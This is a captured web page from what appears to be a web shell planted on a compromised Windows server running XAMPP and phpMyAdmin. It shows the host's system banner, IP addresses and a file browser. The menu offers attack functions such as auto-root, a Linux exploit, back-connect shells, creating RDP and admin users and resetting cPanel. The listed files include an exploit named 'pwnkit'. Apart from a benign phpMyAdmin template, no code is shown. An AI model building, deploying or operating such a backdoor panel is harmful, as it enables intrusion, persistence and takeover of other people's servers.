Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.182
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
server /
collations /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index.twig
1.04
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.twig
<div class=container-fluid> <h2> {{ get_image('s_asci') }} {% trans 'Character sets and collations' %} </h2> {% for charset in charsets %} <div class="card mb-3"> <div class="card-header"> <div><strong>{{ charset.name }}</strong></div> <div>{{ charset.description }}</div> </div> <ul class="list-group list-group-flush"> {% for collation in charset.collations %} <li class="list-group-item"> <div class="row"> <div class="col"> <div><strong>{{ collation.name }}</strong></div> <div>{{ collation.description }}</div> </div> <div class="col align-self-center text-end"> {% if collation.is_default %} <span class="badge bg-secondary text-dark">{% trans %}default{% context %}The collation is the default one{% endtrans %}</span> {% endif %} </div> </div> </li> {% endfor %} </ul> </div> {% endfor %} </div>
Close